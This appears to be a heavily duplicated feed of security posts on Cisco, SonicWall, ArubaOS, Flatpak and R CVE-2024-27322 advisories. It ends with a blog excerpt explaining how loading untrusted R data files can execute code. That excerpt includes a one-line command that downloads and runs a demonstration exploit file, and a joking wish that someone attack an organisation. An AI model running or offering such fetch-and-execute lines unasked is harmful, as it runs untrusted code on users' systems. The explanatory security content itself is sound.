Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

• CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
• CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
• CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

• CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
• CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
• CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

• CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
• CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

• CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
• CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

• CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
• CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011

SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES

• CVE-2024-29010 (7.1 high) GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability
• CVE-2024-29011 (7.5 high) GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability

Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.

#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

• CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
• CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
• CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

• CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
• CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
• CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

• CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
• CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
• CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities

• CVE-2024-20357 (7.5 high) Cisco IP Phone DoS Vulnerability
• CVE-2024-20376 (7.5 high) Cisco IP Phone Information Disclosure Vulnerability
• CVE-2024-20378 (5.3 medium) Cisco IP Phone Unauthorized Access Vulnerability

Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability [sic] that is described in this advisory.

#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability

Flatpak just received a new update 👀

New features:

• Automatically reload D-Bus session bus configuration after installing or upgrading apps, to pick up any exported D-Bus services

Bug fixes:

• Expand the list of environment variables that Flatpak apps do not inherit from the host system
• Don't refuse to start apps when there is no D-Bus system bus available
• Don't try to repeat migration of apps whose data was migrated to a new name and then deleted
• Fix warnings from newer GLib versions
• Always set the container environment variable
• In flatpak ps, add xdg-desktop-portal-gnome to the list of backends we'll use to learn which apps are running in the background
• Avoid leaking a temporary variable from /etc/profile.d/flatpak.sh into the shell environment
• Avoid undefined behaviour of signed left-shift when storing object IDs in a hash table
• Fix Docbook validity in documentation
• Skip more tests when FUSE isn't available
• Fix a misleading comment in the test for CVE-2024-32462

Internal changes:

• Fix Github Workflows recipes

https://github.com/flatpak/flatpak/releases/tag/1.14.7

#Flatpak #FOSS #Container #Containers #OpenSource #Sandbox

Flatpak just received a new update 👀

New features:

• Automatically reload D-Bus session bus configuration after installing or upgrading apps, to pick up any exported D-Bus services

Bug fixes:

• Expand the list of environment variables that Flatpak apps do not inherit from the host system
• Don't refuse to start apps when there is no D-Bus system bus available
• Don't try to repeat migration of apps whose data was migrated to a new name and then deleted
• Fix warnings from newer GLib versions
• Always set the container environment variable
• In flatpak ps, add xdg-desktop-portal-gnome to the list of backends we'll use to learn which apps are running in the background
• Avoid leaking a temporary variable from /etc/profile.d/flatpak.sh into the shell environment
• Avoid undefined behaviour of signed left-shift when storing object IDs in a hash table
• Fix Docbook validity in documentation
• Skip more tests when FUSE isn't available
• Fix a misleading comment in the test for CVE-2024-32462

Internal changes:

• Fix Github Workflows recipes

https://github.com/flatpak/flatpak/releases/tag/1.14.7

#Flatpak #FOSS #Container #Containers #OpenSource #Sandbox

@mafe https://xeiaso.net/shitposts/no-way-to-prevent-this/CVE-2024-1086/

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

• CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
• CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
• CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
• CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

• ArubaOS 10.6.x.x: 10.6.0.0 and above
• ArubaOS 10.5.x.x: 10.5.1.1 and above
• ArubaOS 10.4.x.x: 10.4.1.1 and above
• ArubaOS 8.11.x.x: 8.11.2.2 and above
• ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

CVE-2024-33511: CVSS 9.8

There is a buffer overflow vulnerability in the underlying Automatic Reporting service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port(8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

• CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
• CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
• CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
• CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

• ArubaOS 10.6.x.x: 10.6.0.0 and above
• ArubaOS 10.5.x.x: 10.5.1.1 and above
• ArubaOS 10.4.x.x: 10.4.1.1 and above
• ArubaOS 8.11.x.x: 8.11.2.2 and above
• ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

CVE-2024-33511: CVSS 9.8

There is a buffer overflow vulnerability in the underlying Automatic Reporting service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port(8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

• CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
• CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
• CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
• CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

• ArubaOS 10.6.x.x: 10.6.0.0 and above
• ArubaOS 10.5.x.x: 10.5.1.1 and above
• ArubaOS 10.4.x.x: 10.4.1.1 and above
• ArubaOS 8.11.x.x: 8.11.2.2 and above
• ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

CVE-2024-33511: CVSS 9.8

There is a buffer overflow vulnerability in the underlying Automatic Reporting service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port(8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

• CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
• CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
• CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
• CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

• ArubaOS 10.6.x.x: 10.6.0.0 and above
• ArubaOS 10.5.x.x: 10.5.1.1 and above
• ArubaOS 10.4.x.x: 10.4.1.1 and above
• ArubaOS 8.11.x.x: 8.11.2.2 and above
• ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

CVE-2024-33511: CVSS 9.8

There is a buffer overflow vulnerability in the underlying Automatic Reporting service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port(8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

• CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
• CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
• CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
• CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

• ArubaOS 10.6.x.x: 10.6.0.0 and above
• ArubaOS 10.5.x.x: 10.5.1.1 and above
• ArubaOS 10.4.x.x: 10.4.1.1 and above
• ArubaOS 8.11.x.x: 8.11.2.2 and above
• ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

• CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
• CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
• CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
• CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

• ArubaOS 10.6.x.x: 10.6.0.0 and above
• ArubaOS 10.5.x.x: 10.5.1.1 and above
• ArubaOS 10.4.x.x: 10.4.1.1 and above
• ArubaOS 8.11.x.x: 8.11.2.2 and above
• ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

• CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
• CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
• CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
• CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

• ArubaOS 10.6.x.x: 10.6.0.0 and above
• ArubaOS 10.5.x.x: 10.5.1.1 and above
• ArubaOS 10.4.x.x: 10.4.1.1 and above
• ArubaOS 8.11.x.x: 8.11.2.2 and above
• ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

• CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
• CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
• CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
• CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

• ArubaOS 10.6.x.x: 10.6.0.0 and above
• ArubaOS 10.5.x.x: 10.5.1.1 and above
• ArubaOS 10.4.x.x: 10.4.1.1 and above
• ArubaOS 8.11.x.x: 8.11.2.2 and above
• ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

• CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
• CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
• CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
• CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

• ArubaOS 10.6.x.x: 10.6.0.0 and above
• ArubaOS 10.5.x.x: 10.5.1.1 and above
• ArubaOS 10.4.x.x: 10.4.1.1 and above
• ArubaOS 8.11.x.x: 8.11.2.2 and above
• ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

• CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
• CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
• CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
• CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

• ArubaOS 10.6.x.x: 10.6.0.0 and above
• ArubaOS 10.5.x.x: 10.5.1.1 and above
• ArubaOS 10.4.x.x: 10.4.1.1 and above
• ArubaOS 8.11.x.x: 8.11.2.2 and above
• ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

Vulnerability in R Programming Language Could Fuel Supply Chain Attacks https://www.securityweek.com/vulnerability-in-r-programming-language-enables-supply-chain-attacks/ #Vulnerabilities #vulnerability #CVE202427322 #Featured

Vulnerability in R Programming Language Could Fuel Supply Chain Attacks https://www.securityweek.com/vulnerability-in-r-programming-language-enables-supply-chain-attacks/ #Vulnerabilities #vulnerability #CVE202427322 #Featured

CISA: CERT/CC Reports R Programming Language Vulnerability
I ignored this one but even CISA thinks it's worth mentioning: CVE-2024-27322 (8.8 high) Deserialization of untrusted data in R statistical #Rstats programming language could allow for arbitrary code execution. A cyber threat actor could exploit this vulnerability to take control of an affected system.
Direct link to CERT/CC advisory.

#vulnerability #CVE_2024_27322

CISA: CERT/CC Reports R Programming Language Vulnerability
I ignored this one but even CISA thinks it's worth mentioning: CVE-2024-27322 (8.8 high) Deserialization of untrusted data in R statistical #Rstats programming language could allow for arbitrary code execution. A cyber threat actor could exploit this vulnerability to take control of an affected system.
Direct link to CERT/CC advisory.

#vulnerability #CVE_2024_27322

CISA: CERT/CC Reports R Programming Language Vulnerability
I ignored this one but even CISA thinks it's worth mentioning: CVE-2024-27322 (8.8 high) Deserialization of untrusted data in R statistical #Rstats programming language could allow for arbitrary code execution. A cyber threat actor could exploit this vulnerability to take control of an affected system.
Direct link to CERT/CC advisory.

#vulnerability #CVE_2024_27322

CISA: CERT/CC Reports R Programming Language Vulnerability
I ignored this one but even CISA thinks it's worth mentioning: CVE-2024-27322 (8.8 high) Deserialization of untrusted data in R statistical #Rstats programming language could allow for arbitrary code execution. A cyber threat actor could exploit this vulnerability to take control of an affected system.
Direct link to CERT/CC advisory.

#vulnerability #CVE_2024_27322

CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0 – Source: securityboulevard.com https://ciso2ciso.com/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0-source-securityboulevard-com/ #rssfeedpostgeneratorecho #SecurityBloggersNetwork #CyberSecurityNews #SecurityBoulevard #R

I ended up having to burn time I honestly don't have this week to blog the stuff from the repo I made yesterday due to CERT and CISA making a big deal (https://www.cisa.gov/news-events/alerts/2024/05/01/certcc-reports-r-programming-language-vulnerability) out of expected behavior in #RStats due to a daft, hype-seeking vendor.

The profession that is cybersecurity is stupid broken.

I rly want (someone) to pwn an org with this CVE just to get it on KEV for sad posterity.

https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0/

I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the round on socmed, so here we are.

A security vendor decided to try to get some hype before 2024 RSAC and made a big deal out of what was/is known expected behavior in R data files. R Core took some measures to address the issue they outlined, but for the love of Henry, PLEASE do not think R data files are safe to handle if you weren’t the one creating them, or you do not fully know the provenance of them.

Konrad Rudolph and Iakov Davydov did some ace cyber sleuthing and figured out other ways R data file deserialization can be abused. Please take a moment and drop a note on Mastodon to them saying “thank you”. This is excellent work. We need more folks like them in this ecosystem.

Like many programming languages, R has many footguns, and R data files are one of them. R objects are wonderful beasts, and being able to serialize and deserialize those beasts is a super helpful bit of functionality. Also, R has something called active bindings. Amongst other things, they let you access an object to get a value, but — in doing so — code can get executed without you knowing it. Whether an R data file has an object with active bindings or not, it can be abused by attackers.

When you load() an R data file directly into your R session and into the global environment, the object(s) in it will, well, load there. So, if it has an object named print that’s going to be in your global environment and get called when print() gets called. Lather/rinse/repeat for any other object name. It should be pretty obvious how this could be abused.

A tad more insidious is what happens when you quit R. By default, on quit(), unless you specify otherwise, that function invocation will also call .Last() if it exists in the environment. This functionality exists in the event things need to be cleaned up. One “nice” aspect of .-prefixed R objects is that they’re hidden by default from the environment. So, you may not even notice if an R data file you’ve loaded has that defined. (You likely do not check what’s loaded anyway.)

It’s also possible to create custom R objects that have their own “finalizers” (ref reg.finalizer), which will also get called by default when the objects are being destroyed on quit.

There are also likely other ways to trigger unwanted behavior.

If you want to see how this works, start R from RStudio, the command line, or R GUI. Then, execute the following R code:

load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

Then, quit R/RStudio/R GUI (this will be less dramatic on linux, but the demo should still be effective).

If you must take in untrusted R data files, keep reading.

I threw together an R script along with a safer way to use it (a Docker container) to help R folks inspect the contents of R data files before actually using them. It also looks for some basic shady stuff and alerts you if it finds them. It’s a WIP, and issues + thoughtful PRs are welcome.

If one were to run Rscript check.R from that repo with that exploit.rda file as a parameter, one would see this:

